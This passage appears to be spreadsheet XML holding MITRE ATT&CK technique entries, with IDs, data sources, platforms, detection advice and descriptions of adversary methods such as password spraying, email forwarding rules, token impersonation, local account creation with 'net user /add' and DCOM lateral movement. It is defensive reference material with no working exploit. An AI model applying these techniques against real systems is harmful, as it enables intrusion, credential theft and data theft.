    <t>Linux,macOS,Windows,AWS,GCP,Azure,Office 365,SaaS,Azure AD</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</si>
  <si>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[Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**
Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated.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Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.
Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>defense-evasion,persistence</t>
  </si>
  <si>
    <t>Network intrusion detection system,Anti-virus</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Office 365 account logs,Authentication logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD,SaaS,GCP,AWS,Azure</t>
  </si>
  <si>
    <t>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 It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>Authentication logs,Office 365 account logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,GCP,Azure AD,AWS,Azure,SaaS</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</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</si>
  <si>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</si>
  <si>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T1110.002</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option.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</si>
  <si>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T1110.003</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</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</si>
  <si>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</si>
  <si>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T1110.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Kernel drivers</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</si>
  <si>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</si>
  <si>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Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for two-factor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 (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</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</si>
  <si>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The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001),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</si>
  <si>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</si>
  <si>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Screen Capture</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File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</si>
  <si>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</si>
  <si>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</si>
  <si>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Email Collection</t>
  </si>
  <si>
    <t>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</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</si>
  <si>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&lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt;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&lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</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</si>
  <si>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</si>
  <si>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T1114.001</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Authentication logs,Mail server</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing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</si>
  <si>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</si>
  <si>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T1114.002</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>Authentication logs,Email gateway,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>Office 365,Windows</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server or Office 365 to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Email gateway,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>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`X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress`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`X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient.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 
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention,Process command-line parameters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</si>
  <si>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</si>
  <si>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This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,macOS</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.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</si>
  <si>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Audio Capture</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</si>
  <si>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</si>
  <si>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</si>
  <si>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System Time Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,API monitoring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</si>
  <si>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</si>
  <si>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 (Citation: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 (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,API monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused.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</si>
  <si>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</si>
  <si>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Application control</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.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</si>
  <si>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code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Process monitoring</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</si>
  <si>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</si>
  <si>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Adversaries may abuse shared modules to execute malicious payloads.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&lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;LoadLibrary&lt;/code&gt;, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1132.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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 (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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External Remote Services</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</si>
  <si>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</si>
  <si>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can also be used externally.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t>
  </si>
  <si>
    <t>persistence,initial-access</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</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</si>
  <si>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&lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
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</si>
  <si>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t>
  </si>
  <si>
    <t>Windows User Account Control,System access controls,File system access controls,Heuristic Detection,Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Access tokens,API monitoring</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;, &lt;code&gt; ImpersonateLoggedOnUser &lt;/code&gt;, and &lt;code&gt; SetThreadToken &lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create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An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</t>
  </si>
  <si>
    <t>Windows User Account Control,System access controls,File system access controls</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Create Process with Token</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and use it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Make and Impersonate Token</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If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t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>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process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085)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</si>
  <si>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Heuristic Detection,Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>Windows event logs,Authentication logs,API monitoring</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</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</si>
  <si>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[Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</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</si>
  <si>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t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure AD,Azure,Office 365</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. 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
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</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</si>
  <si>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</si>
  <si>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T1136.001</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with local account creation, such as &lt;code&gt;net user /add&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with domain account creation, such as &lt;code&gt;net user /add /domain&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.</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</si>
  <si>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</si>
  <si>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T1136.003</t>
  </si>
  <si>
    <t>Office 365 audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.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</si>
  <si>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</si>
  <si>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T1137.001</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,File monitoring</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</si>
  <si>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Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)</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</si>
  <si>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</si>
  <si>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T1137.002</t>
  </si>
  <si>
    <t>Office Test</t>
  </si>
  <si>
    <t>DLL monitoring,Loaded DLLs,Process monitoring,Process command-line parameters,File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key.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Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Consider monitoring Office processes for anomalous DLL loads.</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</si>
  <si>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</si>
  <si>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T1137.003</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>Mail server,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>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
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</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</si>
  <si>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</si>
  <si>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T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>Mail server,Process monitoring,Process command-line parameters</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</si>
  <si>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</si>
  <si>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T1137.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior</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</si>
  <si>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</si>
  <si>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Deobfuscate/Decode Files or Information</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</si>
  <si>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</si>
  <si>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use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: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</si>
  <si>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Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>Binary file metadata,Malware reverse engineering,Process monitoring</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</si>
  <si>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</si>
  <si>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**This technique has been deprecated and should no longer be used.**
As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>Application whitelisting,Process whitelisting,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Source</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</si>
  <si>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</si>
  <si>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**This technique has been deprecated and should no longer be used.**
The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;.**This technique has been deprecated and should no longer be used.**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environment.(Citation: Source Manual)
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</t>
  </si>
  <si>
    <t>Component Object Model and Distributed COM</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>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[PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**
Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. 
COM is a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Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>lateral-movement,execution</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistence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 (Citation: Wikipedia Browser Extension) (Citation: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 (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control  (Citation: Chrome Extension C2 Malware).</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process monitoring,API monitoring</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)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(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>File monitoring,Network protocol analysis,Network device logs,Process use of network</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.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</si>
  <si>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</si>
  <si>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Drive-by Compromise</t>
  </si>
  <si>
    <t>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Windows,Linux,macOS,SaaS</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</si>
  <si>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</si>
  <si>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including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.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</si>
  <si>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initial-access</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure,Network</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</si>
  <si>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</si>
  <si>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Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Web proxy,File monitoring</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</si>
  <si>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</si>
  <si>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 (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>File monitoring,Web proxy</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </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</si>
  <si>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 (Citation: Trendmicro NPM Compromise)  
